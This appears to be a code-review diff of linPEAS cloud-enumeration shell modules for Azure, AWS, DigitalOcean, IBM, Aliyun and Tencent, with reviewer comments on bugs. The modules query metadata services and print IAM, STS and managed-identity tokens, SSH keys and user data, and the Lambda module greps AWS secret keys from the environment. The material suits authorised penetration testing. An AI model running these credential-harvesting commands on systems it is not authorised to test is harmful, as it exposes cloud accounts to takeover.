API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp
if [ "$is_az_automation_acc" = "Yes" ]; then
print_2title "Azure Automation Account Service Enumeration"
HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER"
az_req=""
if [ "$(command -v curl || echo -n '')" ]; then
az_req="curl -s -f -L -H '$HEADER'"
elif [ "$(command -v wget || echo -n '')" ]; then
az_req="wget -q -O - --header '$HEADER'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$az_req" ]; then
print_3title "Management token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
echo
print_3title "Graph token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
echo
print_3title "Vault token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
echo
print_3title "Storage token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
fi
echo ""
fi
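Review bot: `API_VERSION="2019-08-01"` is assigned at top level, outside the `if [ "$is_az_automation_acc" = "Yes" ]` guard, so this module overwrites `API_VERSION` on every run, including for any module concatenated after it that relies on its own value (the removed cloud block used `API_VERSION="2021-12-13"` for the Azure VM IMDS); move the assignment inside the guard or give it a module-specific name, and list it under `# Generated Global Variables:` only if it really is meant to be shared. Two header nits: `# Global Variables: $is_az_automation_acc,` has a trailing comma, and `check_az_automation_acc` appears under both `# Functions Used:` and `# Initial Functions:` although the body never calls it, so if the builder only needs it as an initial function it should be dropped from Functions Used.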

View File

@ -0,0 +1,42 @@
# Title: Cloud - DO Droplet
# ID: CL_DO_Droplet
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: DO Droplet Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: check_do, print_2title
# Global Variables: $is_do
# Initial Functions: check_do
# Generated Global Variables: $do_req, $URL
# Fat linpeas: 0
# Small linpeas: 1
if [ "$is_do" = "Yes" ]; then
print_2title "DO Droplet Enumeration"
do_req=""
if [ "$(command -v curl || echo -n '')" ]; then
do_req='curl -s -f -L '
elif [ "$(command -v wget || echo -n '')" ]; then
do_req='wget -q -O - '
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$do_req" ]; then
URL="http://169.254.169.254/metadata"
printf "Id: "; eval $do_req "$URL/v1/id"; echo ""
printf "Region: "; eval $do_req "$URL/v1/region"; echo ""
printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo ""
printf "User data: "; eval $do_req "$URL/v1/user-data"; echo ""
printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo ""
printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces";
printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip";
printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip";
printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags";
printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features";
fi
echo ""
fi
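Review bot: the `eval $do_req "$URL/v1.json" | jq ".interfaces";` line and the four that follow call `jq` unconditionally, so on a droplet without jq each label is followed only by a "command not found" error and the metadata is lost; the deleted cloud block had the same problem, and `exec_with_jq` (which other modules list under `# Functions Used:`) exists for exactly this case, so either route these through it or test `command -v jq` once and fall back to printing the raw `v1.json`. The module also fetches `v1.json` five times for five fields; fetching it once into a variable and filtering that would be cheaper and would reduce the chance of partial results if the metadata endpoint rate-limits.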

View File

@ -0,0 +1,98 @@
# Title: Cloud - Ali Cloud
# ID: CL_Ali_Cloud
# Author: Esonhugh
# Last Update: 22-01-2024
# Description: Ali Cloud Platform Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_3title, print_info
# Global Variables: $is_aliyun_ecs
# Initial Functions: check_aliyun_ecs
# Generated Global Variables: $aliyun_req, $aliyun_token, $i_hostname, $i_instance_id, $i_instance_name, $i_instance_type, $i_aliyun_owner_account, $i_region_id, $i_zone_id, $i_pub_ipv4, $i_priv_ipv4, $net_dns, $mac, $sa, $key
# Fat linpeas: 0
# Small linpeas: 1
if [ "$is_aliyun_ecs" = "Yes" ]; then
aliyun_req=""
aliyun_token=""
if [ "$(command -v curl)" ]; then
aliyun_token=$(curl -X PUT "http://100.100.100.200/latest/api/token" -H "X-aliyun-ecs-metadata-token-ttl-seconds:1000")
aliyun_req='curl -s -f -L -H "X-aliyun-ecs-metadata-token: $aliyun_token"'
elif [ "$(command -v wget)" ]; then
aliyun_token=$(wget -q -O - --method PUT "http://100.100.100.200/latest/api/token" --header "X-aliyun-ecs-metadata-token-ttl-seconds:1000")
aliyun_req='wget -q -O --header "X-aliyun-ecs-metadata-token: $aliyun_token"'
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$aliyun_token" ]; then
print_2title "Aliyun ECS Enumeration"
print_info "https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadata"
echo ""
print_3title "Instance Info"
i_hostname=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/hostname)
[ "$i_hostname" ] && echo "Hostname: $i_hostname"
i_instance_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance-id)
[ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
# no dup of hostname if in ACK it possibly leaks aliyun cluster service ClusterId
i_instance_name=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-name)
[ "$i_instance_name" ] && echo "Instance Name: $i_instance_name"
i_instance_type=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-type)
[ "$i_instance_type" ] && echo "Instance Type: $i_instance_type"
i_aliyun_owner_account=$(eval $aliyun_req http://i00.100.100.200/latest/meta-data/owner-account-id)
[ "$i_aliyun_owner_account" ] && echo "Aliyun Owner Account: $i_aliyun_owner_account"
i_region_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/region-id)
[ "$i_region_id" ] && echo "Region ID: $i_region_id"
i_zone_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/zone-id)
[ "$i_zone_id" ] && echo "Zone ID: $i_zone_id"
echo ""
print_3title "Network Info"
i_pub_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/public-ipv4)
[ "$i_pub_ipv4" ] && echo "Public IPv4: $i_pub_ipv4"
i_priv_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/private-ipv4)
[ "$i_priv_ipv4" ] && echo "Private IPv4: $i_priv_ipv4"
net_dns=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/dns-conf/nameservers)
[ "$net_dns" ] && echo "DNS: $net_dns"
echo "========"
for mac in $(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/); do
echo " Mac: $mac"
echo " Mac interface id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/network-interface-id)
echo " Mac netmask: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/netmask)
echo " Mac vpc id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-id)
echo " Mac vpc cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-cidr-block)
echo " Mac vpc cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-ipv6-cidr-blocks)
echo " Mac vswitch id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-id)
echo " Mac vswitch cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-cidr-block)
echo " Mac vswitch cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-ipv6-cidr-block)
echo " Mac private ips: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/private-ipv4s)
echo " Mac private ips (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6s)
echo " Mac gateway: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/gateway)
echo " Mac gateway (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6-gateway)
echo "======="
done
echo ""
print_3title "Service account "
for sa in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/"); do
echo " Name: $sa"
echo " STS Token: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/$sa")
echo " =============="
done
echo ""
print_3title "Possbile admin ssh Public keys"
for key in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/"); do
echo " Name: $key"
echo " Key: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/${key}openssh-key")
echo " =============="
done
fi
fi
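Review bot: the owner-account request has a typo in the host: `i_aliyun_owner_account=$(eval $aliyun_req http://i00.100.100.200/latest/meta-data/owner-account-id)` uses `i00.100.100.200` where every other request in the module uses `100.100.100.200`, so the account id is never retrieved. The wget branch is also broken: `aliyun_req='wget -q -O --header "X-aliyun-ecs-metadata-token: $aliyun_token"'` is missing the `-` after `-O`, so wget writes the response to a file literally named `--header` and sends no token header; it should read `wget -q -O - --header ...` as the IBM and AWS modules do. Two smaller points: the curl token fetch has no `-s -f`, so an error response body is captured into `$aliyun_token` and `if [ "$aliyun_token" ]` passes with garbage, and when curl or wget exists but the token fetch fails the module prints nothing at all, unlike the "Neither curl nor wget" branch. Typo `Possbile` in the ssh keys title.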


@ -0,0 +1,52 @@
# Title: Cloud - IBM Cloud
# ID: CL_IBM_Cloud
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: IBM Cloud Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: check_ibm_vm, print_2title, print_3title
# Global Variables: $IBM_TOKEN, $is_ibm_vm
# Initial Functions: check_ibm_vm
# Generated Global Variables: $TOKEN_HEADER, $ACCEPT_HEADER, $URL, $ibm_req
# Fat linpeas: 0
# Small linpeas: 0
if [ "$is_ibm_vm" = "Yes" ]; then
print_2title "IBM Cloud Enumeration"
if ! [ "$IBM_TOKEN" ]; then
echo "Couldn't get the metadata token:("
else
TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
ACCEPT_HEADER="Accept: application/json"
URL="http://169.254.169.254/latest/meta-data"
ibm_req=""
if [ "$(command -v curl || echo -n '')" ]; then
ibm_req="curl -s -f -L -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
elif [ "$(command -v wget || echo -n '')" ]; then
ibm_req="wget -q -O - --header '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$ibm_req" ]; then
print_3title "Instance Details"
exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
print_3title "Keys and User data"
exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01"
exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01"
print_3title "Placement Groups"
exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01"
print_3title "IAM credentials"
exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
fi
fi
echo ""
fi
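Review bot: the wget branch `ibm_req="wget -q -O - --header '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"` uses `-H`, which is the curl short option and not accepted by wget; both headers need `--header`. The same branch fails on the IAM token request, where `-X POST` is appended at the call site: that is curl syntax, wget needs `--method=POST`, so the method should be chosen per tool when `ibm_req` is built. Also `URL="http://169.254.169.254/latest/meta-data"` is set and listed under Generated Global Variables but never used (all requests hardcode `/metadata/v1/...`), and `exec_with_jq` is called but missing from the `# Functions Used:` header.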


@ -0,0 +1,88 @@
# Title: Cloud - Tencent Cloud
# ID: CL_Tencent_Cloud
# Author: Shadowabi
# Last Update: 22-01-2024
# Description: Tencent Cloud Platform Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_3title, print_info
# Global Variables: $is_tencent_cvm
# Initial Functions: check_tencent_cvm
# Generated Global Variables: $tencent_req, $i_tencent_owner_account, $i_hostname, $i_instance_id, $i_instance_name, $i_instance_type, $i_region_id, $i_zone_id, $mac_tencent, $lipv4, $sa_tencent, $key_tencent
# Fat linpeas: 0
# Small linpeas: 1
if [ "$is_tencent_cvm" = "Yes" ]; then
tencent_req=""
if [ "$(command -v curl)" ]; then
tencent_req='curl --connect-timeout 2 -sfkG'
elif [ "$(command -v wget)" ]; then
tencent_req='wget -q --timeout 2 --tries 1 -O -'
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
print_2title "Tencent CVM Enumeration"
print_info "https://cloud.tencent.com/document/product/213/4934"
# Todo: print_info "Hacktricks Documents needs to be updated"
echo ""
print_3title "Instance Info"
i_tencent_owner_account=$(eval $tencent_req http://169.254.0.23/latest/meta-data/app-id)
[ "$i_tencent_owner_account" ] && echo "Tencent Owner Account: $i_tencent_owner_account"
i_hostname=$(eval $tencent_req http://169.254.0.23/latest/meta-data/hostname)
[ "$i_hostname" ] && echo "Hostname: $i_hostname"
i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-id)
[ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/uuid)
[ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
i_instance_name=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-name)
[ "$i_instance_name" ] && echo "Instance Name: $i_instance_name"
i_instance_type=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance/instance-type)
[ "$i_instance_type" ] && echo "Instance Type: $i_instance_type"
i_region_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/region)
[ "$i_region_id" ] && echo "Region ID: $i_region_id"
i_zone_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/zone)
[ "$i_zone_id" ] && echo "Zone ID: $i_zone_id"
echo ""
print_3title "Network Info"
for mac_tencent in $(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/); do
echo " Mac: $mac_tencent"
echo " Primary IPv4: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/primary-local-ipv4)
echo " Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/public-ipv4s)
echo " Mac vpc id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/vpc-id)
echo " Mac subnet id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/subnet-id)
for lipv4 in $(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s); do
echo " Mac local ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/local-ipv4)
echo " Mac gateways: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/gateway)
echo " Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4)
echo " Mac public ips mode: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4-mode)
echo " Mac subnet mask: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/subnet-mask)
done
echo "======="
done
echo ""
print_3title "Service account "
for sa_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/"); do
echo " Name: $sa_tencent"
echo " STS Token: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/$sa_tencent")
echo " =============="
done
echo ""
print_3title "Possbile admin ssh Public keys"
for key_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/"); do
echo " Name: $key_tencent"
echo " Key: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/${key_tencent}openssh-key")
echo " =============="
done
echo ""
print_3title "User Data"
eval $tencent_req http://169.254.0.23/latest/user-data; echo ""
fi
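Review bot: nothing guards the enumeration on `$tencent_req` being set. After the `else` branch reports that neither curl nor wget exists, execution continues into `print_2title "Tencent CVM Enumeration"` and every `$(eval $tencent_req http://169.254.0.23/...)` expands to `eval http://169.254.0.23/...`, which tries to execute the URL as a command. Wrap the body in `if [ "$tencent_req" ]; then ... fi` as the AWS EC2, IBM and Azure modules do. The second instance id query reuses the variable and label: `i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/uuid)` followed by `echo "Instance ID: $i_instance_id"` prints the UUID under the "Instance ID" heading; give it its own variable (and list it in Generated Global Variables) with a "UUID" label. Typo `Possbile` in the ssh keys title; the `# Todo:` comment should either become a `print_info` or be dropped.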


@ -0,0 +1,34 @@
# Title: Cloud - Check if in cloud
# ID: CL_Check_if_in_cloud
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Check if the current system is inside a cloud environment
# License: GNU GPL
# Version: 1.0
# Functions Used: check_aws_codebuild, check_aws_ec2, check_aws_ecs, check_aws_lambda, check_az_app, check_az_vm, check_az_automation_acc, check_do, check_gcp, check_ibm_vm, check_tencent_cvm, print_list
# Global Variables: $is_aws_codebuild, $is_aws_ecs, $is_aws_ec2, , $is_aws_lambda, $is_az_app, $is_az_automation_acc, $is_az_vm, $is_do, $is_gcp_vm, $is_gcp_function, $is_ibm_vm, $is_aws_ec2_beanstalk, $is_aliyun_ecs, $is_tencent_cvm
# Initial Functions: check_gcp, check_aws_ecs, check_aws_ec2, check_aws_lambda, check_aws_codebuild, check_do, check_ibm_vm, check_az_vm, check_az_app, check_az_automation_acc, check_aliyun_ecs, check_tencent_cvm
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
printf "${YELLOW}Learn and practice cloud hacking techniques in ${BLUE}https://training.hacktricks.xyz\n"$NC
echo ""
print_list "GCP Virtual Machine? ................. $is_gcp_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "GCP Cloud Funtion? ................... $is_gcp_function\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "Azure VM or Az metadata? ............. $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "Azure APP or IDENTITY_ENDPOINT? ...... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "Azure Automation Account? ............ $is_az_automation_acc\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "Aliyun ECS? .......................... $is_aliyun_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
print_list "Tencent CVM? ......................... $is_tencent_cvm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
echo ""
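Review bot: the `# Global Variables:` header has a stray empty entry (`$is_aws_ec2, , $is_aws_lambda`), and `# Functions Used:` omits `check_aliyun_ecs` even though it appears in `# Initial Functions:` and `$is_aliyun_ecs` is printed; keep the two lists consistent. Typo `Funtion` in `"GCP Cloud Funtion? ..."`. The `sed "s,Yes,${SED_RED},"` / `"s,No,${SED_GREEN},"` pair colours the first `Yes`/`No` anywhere in the line, which works for these fixed labels but would misfire on any future label containing either word; anchoring on the trailing value (`Yes$`) is safer.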


@ -0,0 +1,85 @@
# Title: Cloud - AWS EC2
# ID: CL_AWS_EC2
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: AWS EC2 Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: check_aws_ec2, exec_with_jq, print_2title, print_3title
# Global Variables: $is_aws_ec2
# Initial Functions: check_aws_ec2
# Generated Global Variables: $aws_req, $HEADER, $URL, $mac, $role, $TOKEN, $TOKEN_HEADER, $TOKEN_TTL
# Fat linpeas: 0
# Small linpeas: 1
if [ "$is_aws_ec2" = "Yes" ]; then
print_2title "AWS EC2 Enumeration"
TOKEN=""
TOKEN_HEADER="X-aws-ec2-metadata-token"
TOKEN_TTL="X-aws-ec2-metadata-token-ttl-seconds: 21600"
URL="http://169.254.169.254/latest/meta-data"
aws_req=""
if [ "$(command -v curl || echo -n '')" ]; then
# Get token for IMDSv2
TOKEN=$(curl -s -f -X PUT "http://169.254.169.254/latest/api/token" -H "$TOKEN_TTL" 2>/dev/null)
aws_req="curl -s -f -L -H '$TOKEN_HEADER: $TOKEN'"
elif [ "$(command -v wget || echo -n '')" ]; then
# Get token for IMDSv2
TOKEN=$(wget -q -O - --method=PUT --header="$TOKEN_TTL" "http://169.254.169.254/latest/api/token" 2>/dev/null)
aws_req="wget -q -O - --header '$TOKEN_HEADER: $TOKEN'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$aws_req" ]; then
printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
echo ""
print_3title "Account Info"
exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
echo ""
print_3title "Network Info"
for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do
echo "Mac: $mac"
printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
echo ""
done
echo ""
print_3title "IAM Role"
exec_with_jq eval $aws_req "$URL/iam/info"; echo ""
for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do
echo "Role: $role"
exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
echo ""
done
echo ""
print_3title "User Data"
eval $aws_req "http://169.254.169.254/latest/user-data"; echo ""
echo ""
print_3title "EC2 Security Credentials"
exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
print_3title "SSM Runnig"
ps aux 2>/dev/null | grep "ssm-agent" | grep -Ev "grep|sed s,ssm-agent" | sed "s,ssm-agent,${SED_RED},"
fi
echo ""
fi
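Review bot: `TOKEN` is used unconditionally. If the IMDSv2 PUT fails (for example because of the hop limit when running inside a container), `aws_req="curl -s -f -L -H '$TOKEN_HEADER: $TOKEN'"` still sends `X-aws-ec2-metadata-token:` with an empty value; worth verifying that an IMDSv1-only instance accepts that and, if not, dropping the header when `$TOKEN` is empty. The `"Private IPv4s:"` label points at `$URL/network/interfaces/macs/$mac/ipv4-associations/`, which lists the public IPs that have associations; the private addresses are under `local-ipv4s`. `$HEADER` is declared in Generated Global Variables but never set (`TOKEN_HEADER` is the one used). Typo `SSM Runnig`.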


@ -0,0 +1,48 @@
# Title: Cloud - AWS ECS
# ID: CL_AWS_ECS
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: AWS ECS Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: check_aws_ecs, exec_with_jq, print_2title, print_3title
# Global Variables: $aws_ecs_metadata_uri, $aws_ecs_service_account_uri, $is_aws_ecs
# Initial Functions: check_aws_ecs
# Generated Global Variables: $aws_ecs_req
# Fat linpeas: 0
# Small linpeas: 1
if [ "$is_aws_ecs" = "Yes" ]; then
print_2title "AWS ECS Enumeration"
aws_ecs_req=""
if [ "$(command -v curl || echo -n '')" ]; then
aws_ecs_req='curl -s -f'
elif [ "$(command -v wget || echo -n '')" ]; then
aws_ecs_req='wget -q -O -'
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$aws_ecs_metadata_uri" ]; then
print_3title "Container Info"
exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"
echo ""
print_3title "Task Info"
exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task"
echo ""
else
echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
fi
if [ "$aws_ecs_service_account_uri" ]; then
print_3title "IAM Role"
exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri"
echo ""
else
echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
fi
echo ""
fi
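Review bot: the requests run even when `aws_ecs_req` is empty. The `else` branch reports that neither curl nor wget was found, but `if [ "$aws_ecs_metadata_uri" ]` and `if [ "$aws_ecs_service_account_uri" ]` then call `exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"`, which evaluates the bare URL as a command. Guard both blocks with `[ "$aws_ecs_req" ]` as the EC2 and Codebuild modules do. The error text names only `ECS_CONTAINER_METADATA_URI`; newer task definitions expose `ECS_CONTAINER_METADATA_URI_V4` instead, so either have `check_aws_ecs` fall back to it or mention both in the message.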


@ -0,0 +1,27 @@
# Title: Cloud - AWS Lambda
# ID: CL_AWS_Lambda
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: AWS Lambda Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: check_aws_lambda, print_2title
# Global Variables: $is_aws_lambda
# Initial Functions: check_aws_lambda
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
if [ "$is_aws_lambda" = "Yes" ]; then
print_2title "AWS Lambda Enumeration"
printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
printf "Region: "; env | grep AWS_REGION
printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY
printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID
printf "Session token: "; env | grep AWS_SESSION_TOKEN
printf "Security token: "; env | grep AWS_SECURITY_TOKEN
printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API
printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
echo ""
fi
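Review bot: `curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next"` is the Runtime API long-poll: it blocks until the next invocation arrives and hands that event to the caller, so in a live function this line can hang the scan indefinitely and, when it does return, consumes an invocation the real runtime was waiting for. Add `--max-time` (and `--timeout`/`--tries 1` on the wget fallback) and state the side effect in the output. This is also the only cloud module that does not check `command -v curl` before use and prints no "Neither curl nor wget" message. The `env | grep AWS_REGION` pattern matches substrings; anchoring with `grep '^AWS_REGION='` avoids pulling in unrelated variables with the same prefix.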


@ -0,0 +1,40 @@
# Title: Cloud - AWS Codebuild
# ID: CL_AWS_Codebuild
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: AWS Codebuild Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: check_aws_codebuild, exec_with_jq, print_2title, print_3title
# Global Variables: $is_aws_codebuild
# Initial Functions: check_aws_codebuild
# Generated Global Variables: $aws_req, $METADATA_URL, $CREDS_PATH, $URL_CREDS
# Fat linpeas: 0
# Small linpeas: 0
if [ "$is_aws_codebuild" = "Yes" ]; then
print_2title "AWS Codebuild Enumeration"
aws_req=""
if [ "$(command -v curl || echo -n '')" ]; then
aws_req="curl -s -f"
elif [ "$(command -v wget || echo -n '')" ]; then
aws_req="wget -q -O -"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
echo "The addresses are in /codebuild/output/tmp/env.sh"
